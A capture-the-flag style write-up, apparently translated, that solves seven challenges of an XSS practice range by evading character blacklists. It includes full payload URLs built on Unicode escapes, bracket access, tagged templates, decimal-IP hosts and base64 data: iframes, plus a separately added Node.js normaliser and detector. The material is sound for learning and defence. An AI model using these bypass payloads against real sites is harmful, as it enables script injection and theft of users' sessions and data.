
XSS bypass (advanced)


This Wind


I came across an XSS practice range built by a fellow on 知识星球 (Zhishi Xingqiu); it looked good, and I learned quite a bit from working through it. Out of laziness I am only writing it up now.
The range has eight challenges in total; I only solved seven.


Range address: http://xcao.vip
The final goal of every challenge is to load: http://xcao.vip/xss/alert.js

Challenge 1

独孤九剑-第一式 (Dugu Nine Swords, first form)
Filtered: `=` `(` `)`. The injection point is inside a tag.


Close the tag with `">` and open a `<script>` tag, then use document.write to write the JS into the current page; the `<script src=...>` string is written entirely as Unicode escapes inside a template literal, and document.write is called as a tagged template, so neither `=` nor `()` is needed.
Payload:

http://xcao.vip/test/xss1.php?data=1%22%3E%3Cscript%3Edocument.write`\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0078\u0063\u0061\u006f\u002e\u0076\u0069\u0070\u002f\u0078\u0073\u0073\u002f\u0061\u006c\u0065\u0072\u0074\u002e\u006a\u0073\u0022\u003e\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e`%3C/script%3E%3C!--)


Challenge 2

独孤九剑-第二式 (Dugu Nine Swords, second form)
Filtered: `=` `(` `)` `.`. The injection point is inside a tag.

Close the tag with `">` and open a `<script>` tag as before, but since `.` is now filtered, reach document.write through `top` with bracket access (`top["document"]["write"]`) and write the JS into the current page.
Payload:

http://xcao.vip/test/xss2.php?data=1%22%3E%3Cscript%3Etop[%22document%22][%22write%22]`\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0078\u0063\u0061\u006f\u002e\u0076\u0069\u0070\u002f\u0078\u0073\u0073\u002f\u0061\u006c\u0065\u0072\u0074\u002e\u006a\u0073\u0022\u003e\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e`%3C/script%3E%20%3C!--


Challenge 3

独孤九剑-第三式 (Dugu Nine Swords, third form)
Filtered: `(` `)` `.` `&` `#`. This means Unicode escapes and HTML entities can no longer be used, but `=` is allowed again.

Host the JS on some public IP address, then write that IP as a single decimal integer so that no `.` is needed.
On that host, a PHP 302 redirect forwards to the target script:

<?php
header("Location: http://suo.im/5U1ERv");
?>

Payload:

http://xcao.vip/test/xss3.php?data=1%22%3E%3Cscript%20src=%22http://2130706433%22%3E%3C/script%3E%3C!--

Here 2130706433 is 127.0.0.1 written as a decimal integer.

Challenge 4

独孤九剑-第四式 (Dugu Nine Swords, fourth form)
Filtered: `=` `(` `)` `.` `&` `#` `\`.

Use an iframe tag whose source is a base64-encoded data: document containing the JS loader; the filtered `=` is produced with `String["fromCharCode"]`61``.

http://xcao.vip/test/xss4.php?data=1%22%3E%3Cscript%3Etop[%22document%22][%22write%22]`${top[%22String%22][%22fromCharCode%22]`61`%2b%22data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3hjYW8udmlwL3hzcy9hbGVydC5qcz48L3NjcmlwdD4=%3E111%3C/iframe%3E%22}%20%3Ciframe%20src`%3C/script%3E%3C!--


Challenges 5 and 6 can both be solved with this same payload, so I did not bother coming up with another one.

Challenge 7

独孤九剑-第七式 (Dugu Nine Swords, seventh form)
Filtered: `=` `(` `)` `.` `&` `#` `\` `%` `<` `>`. The injection point is inside JS.



Produce `=`, `<` and `>` from their ASCII codes (60, 61, 62 via fromCharCode) and tweak the previous payload slightly:

http://xcao.vip/test/xss7.php?data=%22%22;top[%22document%22][%22write%22]`${top[%22String%22][%22fromCharCode%22]`60`%2b%22iframe%20src%22%2btop[%22String%22][%22fromCharCode%22]`61`%2b%22data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3hjYW8udmlwL3hzcy9hbGVydC5qcz48L3NjcmlwdD4=%22%2btop[%22String%22][%22fromCharCode%22]`62`}`

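Every solution above works because the filter blacklists characters without looking through the encodings the browser will undo (URL encoding, `\uXXXX` escapes, fromCharCode, decimal IP hosts, base64 data: URIs). As an added example that is not part of the original write-up, here is a log/WAF normaliser that peels those layers off challenge-style inputs so a detector sees the markup that actually executes; it assumes Node.js (Buffer for base64) and uses constructed samples modelled on the payloads from challenges 1, 3 and 7.

```javascript
// Added example, not from the write-up. Assumes Node.js (Buffer for base64 decoding).
const CHARCODE = /top\["String"\]\["fromCharCode"\]`(\d+)`|String\.fromCharCode\((\d+)\)/g;
const SUSPICIOUS = /<\s*(script|iframe)\b|\bdocument\.write\b|\["document"\]\["write"\]/i;

// 2130706433 -> "127.0.0.1": browsers accept one decimal integer as a whole IPv4 host
function decimalToDottedQuad(n) {
  const v = Number(n) >>> 0;
  return [24, 16, 8, 0].map((shift) => (v >>> shift) & 255).join(".");
}

// Peel the encoding layers a character blacklist never looks through.
function normalize(raw) {
  let s = raw;
  try { s = decodeURIComponent(s); } catch (_) { /* malformed %-sequence: keep as-is */ }
  // \u003c escapes: a template literal turns them into literal characters
  s = s.replace(/\\u([0-9a-fA-F]{4})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
  // String.fromCharCode`61` (tagged template) or (61) yields the character itself
  s = s.replace(CHARCODE, (_, a, b) => String.fromCharCode(Number(a ?? b)));
  // heuristic: drop '"+' / '+"' glue so concatenated fragments read as one string
  s = s.replace(/"\s*\+|\+\s*"/g, "");
  // a decimal host such as http://2130706433 resolves to 127.0.0.1
  s = s.replace(/:\/\/(\d{1,10})(?=[\/"'\s>`=]|$)/g, (_, n) => "://" + decimalToDottedQuad(n));
  // inline base64 documents: append the decoded HTML so it is inspected as well
  s = s.replace(/data:text\/html;base64,([A-Za-z0-9+/=]+)/g,
    (m, b64) => m + " " + Buffer.from(b64, "base64").toString("utf8"));
  return s;
}

function isSuspicious(raw) {
  return SUSPICIOUS.test(normalize(raw));
}

// Constructed samples modelled on the write-up's payloads (backslashes doubled for JS source)
const SAMPLES = {
  unicode: '1%22%3E%3Cscript%3Edocument.write`\\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074'
    + '\\u0020\\u0073\\u0072\\u0063\\u003d\\u0022http://xcao.vip/xss/alert.js\\u0022\\u003e`%3C/script%3E%3C!--',
  decimalIp: '1%22%3E%3Cscript%20src=%22http://2130706433%22%3E%3C/script%3E%3C!--',
  charcode: '%22%22;top[%22document%22][%22write%22]`${top[%22String%22][%22fromCharCode%22]`60`%2b%22iframe%20src%22'
    + '%2btop[%22String%22][%22fromCharCode%22]`61`%2b%22data:text/html;base64,'
    + 'PHNjcmlwdCBzcmM9aHR0cDovL3hjYW8udmlwL3hzcy9hbGVydC5qcz48L3NjcmlwdD4=%22%2btop[%22String%22][%22fromCharCode%22]`62`}`',
  benign: 'hello%20world%20%3D%201',
};

for (const [name, raw] of Object.entries(SAMPLES)) {
  console.log(name, isSuspicious(raw) ? "SUSPICIOUS" : "ok", "->", normalize(raw));
}
```

The decoded output shows the same `<script src=...alert.js>` for all three payloads, which is why a fix for this class of bug is context-aware output encoding of the injected value rather than a longer character blacklist.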

Aside

Challenge 8's filter is too brutal; I have no ideas for it yet.


Original article: https://422926799.github.io/posts/6bcf9b8f.html
